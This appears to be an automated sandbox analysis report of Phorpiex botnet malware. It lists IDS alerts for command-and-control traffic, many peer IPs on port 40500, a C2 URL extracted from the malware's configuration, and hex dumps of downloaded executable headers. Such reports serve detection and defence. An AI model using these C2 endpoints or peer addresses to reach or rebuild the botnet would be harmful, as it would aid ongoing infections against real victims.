Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49838 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.236.217.71:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.219.115.156:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49860 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 213.230.126.39:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49903 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 217.30.162.161:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49912 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 95.59.165.102:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49922 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49933 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.179.117.33:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49941 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 88.204.241.182:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 90.156.160.30:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49963 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49971 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49981 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 154.71.253.54:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 92.124.152.236:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49991 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 90.156.162.5:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49953 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50003 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50020 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 151.242.48.19:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50028 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 31.47.175.39:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50033 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50035 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 78.109.103.103:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 85.9.133.202:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 38.222.194.190:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50041 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50048 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 189.173.142.192:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 109.68.122.14:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50054 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50057 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50046 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50050 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 46.248.34.12:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.133.70.66:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 189.167.22.36:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50068 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50070 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 198.163.204.6:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50080 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50052 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50071 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50059 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50073 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 212.13.170.223:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50089 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 5.76.0.203:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50078 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50064 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50087 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50055 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50075 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50082 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 178.67.165.88:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 178.253.102.214:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.180.115.76:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50045 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50084 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50038 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50031 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 37.21.118.106:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.249.62.7:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50085 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50063 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50077 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50010 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50066 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50061 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50036 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50043 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.11:49710
Source: Network traffic	Suricata IDS: 2853272 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound : 185.215.113.66:80 -> 192.168.2.11:49710

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 92.255.85.66 5188

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f

Contains functionality to check if Internet connection is working

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com	4_2_0040AA80
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com	5_2_0040AA80
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com	7_2_0040AA80

Source: unknown

Network traffic detected: IP country count 20

Source: global traffic	TCP traffic: 192.168.2.11:49757 -> 109.68.122.14:40500
Source: global traffic	TCP traffic: 192.168.2.11:49792 -> 92.255.85.66:5188
Source: global traffic	TCP traffic: 192.168.2.11:49799 -> 176.67.79.229:40500
Source: global traffic	TCP traffic: 192.168.2.11:49828 -> 38.224.37.24:40500
Source: global traffic	TCP traffic: 192.168.2.11:49866 -> 5.202.242.190:40500
Source: global traffic	TCP traffic: 192.168.2.11:49895 -> 128.65.180.156:40500
Source: global traffic	TCP traffic: 192.168.2.11:49910 -> 80.191.218.209:40500
Source: global traffic	TCP traffic: 192.168.2.11:49924 -> 90.156.160.6:40500
Source: global traffic	TCP traffic: 192.168.2.11:49939 -> 5.251.95.166:40500
Source: global traffic	TCP traffic: 192.168.2.11:49951 -> 90.156.162.125:40500
Source: global traffic	TCP traffic: 192.168.2.11:49964 -> 151.243.58.90:40500
Source: global traffic	TCP traffic: 192.168.2.11:49977 -> 88.204.241.182:40500
Source: global traffic	TCP traffic: 192.168.2.11:49992 -> 189.150.7.86:40500
Source: global traffic	TCP traffic: 192.168.2.11:50005 -> 102.207.195.84:40500
Source: global traffic	TCP traffic: 192.168.2.11:50016 -> 134.35.64.189:40500
Source: global traffic	TCP traffic: 192.168.2.11:50029 -> 90.156.160.30:40500
Source: global traffic	TCP traffic: 192.168.2.11:50032 -> 77.44.150.37:40500
Source: global traffic	TCP traffic: 192.168.2.11:50034 -> 5.251.47.42:40500
Source: global traffic	TCP traffic: 192.168.2.11:50037 -> 90.156.163.119:40500
Source: global traffic	TCP traffic: 192.168.2.11:50039 -> 185.215.113.66:5152
Source: global traffic	TCP traffic: 192.168.2.11:50040 -> 46.248.34.12:40500
Source: global traffic	TCP traffic: 192.168.2.11:50042 -> 90.156.162.5:40500
Source: global traffic	TCP traffic: 192.168.2.11:50044 -> 189.252.61.8:40500
Source: global traffic	TCP traffic: 192.168.2.11:50047 -> 151.232.164.243:40500
Source: global traffic	TCP traffic: 192.168.2.11:50049 -> 85.73.234.113:40500
Source: global traffic	TCP traffic: 192.168.2.11:50051 -> 89.218.44.218:40500
Source: global traffic	TCP traffic: 192.168.2.11:50053 -> 151.234.26.66:40500
Source: global traffic	TCP traffic: 192.168.2.11:50056 -> 93.123.145.179:40500
Source: global traffic	TCP traffic: 192.168.2.11:50058 -> 89.236.219.80:40500
Source: global traffic	TCP traffic: 192.168.2.11:50060 -> 146.120.17.117:40500
Source: global traffic	TCP traffic: 192.168.2.11:50062 -> 203.142.81.102:40500
Source: global traffic	TCP traffic: 192.168.2.11:50065 -> 201.138.180.213:40500
Source: global traffic	TCP traffic: 192.168.2.11:50067 -> 2.134.250.184:40500
Source: global traffic	TCP traffic: 192.168.2.11:50069 -> 95.56.98.17:40500
Source: global traffic	TCP traffic: 192.168.2.11:50074 -> 212.22.213.217:40500
Source: global traffic	TCP traffic: 192.168.2.11:50076 -> 95.142.87.201:40500
Source: global traffic	TCP traffic: 192.168.2.11:50079 -> 213.230.99.184:40500
Source: global traffic	TCP traffic: 192.168.2.11:50081 -> 90.156.160.54:40500
Source: global traffic	TCP traffic: 192.168.2.11:50090 -> 213.230.126.39:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 95.81.102.72:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 92.38.19.10:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 45.150.24.42:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.187.91.108:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 109.74.69.43:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 77.44.198.123:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.133.136.145:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.176.72.136:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 89.236.217.71:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 89.219.115.156:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.179.117.33:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 217.30.162.161:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 95.59.165.102:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 5.236.121.2:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 187.230.224.82:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 154.71.253.54:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 92.124.152.236:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 90.156.163.10:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 37.120.247.128:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 151.242.48.19:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 89.218.218.206:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 178.67.165.88:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 31.47.175.39:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 189.173.142.192:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 198.163.204.6:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 85.9.133.202:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 37.21.118.106:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 38.222.194.190:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 78.109.103.103:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.133.70.66:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 5.76.0.203:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.176.94.43:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.190.224.152:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 189.167.22.36:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 90.156.163.98:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 212.13.170.223:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 89.249.62.7:40500
Source: global traffic	UDP traffic: 192.168.2.11:62307 -> 2.177.40.206:40500

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:31:40 GMTContent-Type: application/octet-streamContent-Length: 10240Last-Modified: Sun, 24 Nov 2024 16:23:03 GMTConnection: keep-aliveETag: "674352e7-2800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 52 43 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 16 00 00 00 00 00 00 e1 16 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 d6 e4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 24 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 0c 00 00 00 10 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 0a 00 00 00 20 00 00 00 0c 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 03 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 06 02 00 00 00 50 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:31:44 GMTContent-Type: application/octet-streamContent-Length: 80896Last-Modified: Tue, 12 Nov 2024 22:30:51 GMTConnection: keep-aliveETag: "6733d71b-13c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 24 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fa 33 00 00 00 00 01 00 00 34 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 2f 00 00 00 40 01 00 00 20 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
